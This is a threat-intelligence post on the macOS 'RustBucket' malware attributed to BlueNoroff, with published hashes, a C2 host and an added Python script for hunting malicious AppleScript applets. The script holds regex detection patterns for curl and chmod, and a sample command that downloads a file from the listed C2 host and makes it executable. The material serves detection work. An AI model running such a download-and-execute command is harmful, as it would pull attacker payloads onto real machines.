BlueNoroff APT group targets macOS with ‘RustBucket’ Malware
By Ferdous Saljooki and Jaron Bradley
Jamf Threat Labs has discovered a macOS malware family that communicates with command and control (C2) servers to download and execute further payloads. We track and protect against this malware family under the name ‘RustBucket’ and suspect it is the work of a North Korean, state-sponsored threat actor. The APT group known as BlueNoroff, thought to operate as a sub-group of the well-known Lazarus Group, is believed to be behind this attack. The attribution rests on similarities with a Kaspersky blog entry documenting an attack by the same group on Windows: the malicious tooling we found on macOS closely mirrors the workflow and social engineering patterns used in that campaign.
Stage-One
The stage-one malware (0be69bb9836b2a266bfd9a8b93bb412b6e4ce1be) was discovered while performing normal hunting routines for compiled AppleScript applications that contained various suspicious commands. Among our results, we identified a suspicious AppleScript file titled …
IoC
0be69bb9836b2a266bfd9a8b93bb412b6e4ce1be
182760cbe11fa0316abfb8b7b00b63f83159f5aa
7e69cb4f9c37fad13de85e91b5a05a816d14f490
ca59874172660e6180af2815c3a42c85169aa0b2
http://cloud.dnx.capital
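The stage-one section describes hunting for compiled AppleScript applets that contain suspicious commands, and the list above gives the file hashes and C2 host to match against. The following triage script is an added example, not Jamf's own tooling: it walks a directory tree, hashes every file against the published SHA-1 indicators, flags `.app` bundles that carry a compiled script at the standard applet location (`Contents/Resources/Scripts/main.scpt`), and screens decompiled script text for a handful of commands. The list of "suspicious" commands is an assumption for illustration; the post does not say which commands Jamf's hunting routine looks for. The demo directory tree and script text are constructed inline so the example runs offline on any platform.

```python
"""Triage helper for compiled AppleScript applets using the IoCs from this post.
Added example; the SUSPICIOUS patterns below are assumed heuristics, not Jamf's."""
import hashlib
import os
import re
import tempfile

# SHA-1 file hashes and C2 host published in the IoC section of the post.
IOC_SHA1 = {
    "0be69bb9836b2a266bfd9a8b93bb412b6e4ce1be",
    "182760cbe11fa0316abfb8b7b00b63f83159f5aa",
    "7e69cb4f9c37fad13de85e91b5a05a816d14f490",
    "ca59874172660e6180af2815c3a42c85169aa0b2",
}
IOC_C2 = "cloud.dnx.capital"

# Assumed heuristics: AppleScript/shell constructs that are uncommon in benign
# applets but typical of downloaders. Extend with whatever your hunt needs.
SUSPICIOUS = [
    re.compile(r"do shell script", re.I),
    re.compile(r"\bcurl\b", re.I),
    re.compile(r"\bchmod\s+\+x", re.I),
    re.compile(r"\bosascript\b", re.I),
    re.compile(r"\bopen\s+-a\b", re.I),
]


def sha1_of(path: str) -> str:
    """Stream a file through SHA-1 (the digest type used in the IoC list)."""
    h = hashlib.sha1()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def is_applescript_applet(app_dir: str) -> bool:
    """Applets exported from Script Editor keep the compiled script here."""
    return os.path.isfile(os.path.join(
        app_dir, "Contents", "Resources", "Scripts", "main.scpt"))


def suspicious_commands(script_text: str) -> list:
    """Return the assumed-suspicious patterns found in decompiled script text."""
    return [p.pattern for p in SUSPICIOUS if p.search(script_text)]


def references_c2(text: str) -> bool:
    """True if the text mentions the C2 host from the IoC list."""
    return IOC_C2 in text.lower()


def triage(root: str) -> dict:
    """Hash every regular file under root against IOC_SHA1 and collect applet
    bundles for follow-up decompilation (osadecompile on macOS)."""
    hash_hits, applets = [], []
    for dirpath, _dirs, filenames in os.walk(root):
        if dirpath.endswith(".app") and is_applescript_applet(dirpath):
            applets.append(dirpath)
        for name in filenames:
            path = os.path.join(dirpath, name)
            if os.path.isfile(path) and not os.path.islink(path):
                if sha1_of(path) in IOC_SHA1:
                    hash_hits.append(path)
    return {"hash_hits": hash_hits, "applets": applets}


def build_demo_tree() -> str:
    """Constructed sample: one applet-shaped bundle plus an unrelated file."""
    root = tempfile.mkdtemp(prefix="applet-hunt-")
    scripts = os.path.join(root, "Invoice.app", "Contents", "Resources", "Scripts")
    os.makedirs(scripts)
    with open(os.path.join(scripts, "main.scpt"), "wb") as f:
        f.write(b"FasdUAS 1.101.10")  # constructed placeholder, not a real applet
    with open(os.path.join(root, "notes.txt"), "w") as f:
        f.write("abc")
    return root


# Constructed stand-in for decompiled applet text (not the real RustBucket script).
DEMO_SCRIPT = 'do shell script "curl -o /tmp/p http://cloud.dnx.capital/x; chmod +x /tmp/p"'

if __name__ == "__main__":
    result = triage(build_demo_tree())
    print("hash hits:", result["hash_hits"])
    print("applets to decompile:", result["applets"])
    print("suspicious:", suspicious_commands(DEMO_SCRIPT), "c2:", references_c2(DEMO_SCRIPT))
```

On macOS, feed each returned applet's `main.scpt` to `osadecompile` and pass the output to `suspicious_commands` and `references_c2`; a hash hit alone is decisive, while the command heuristics only prioritise what to look at next.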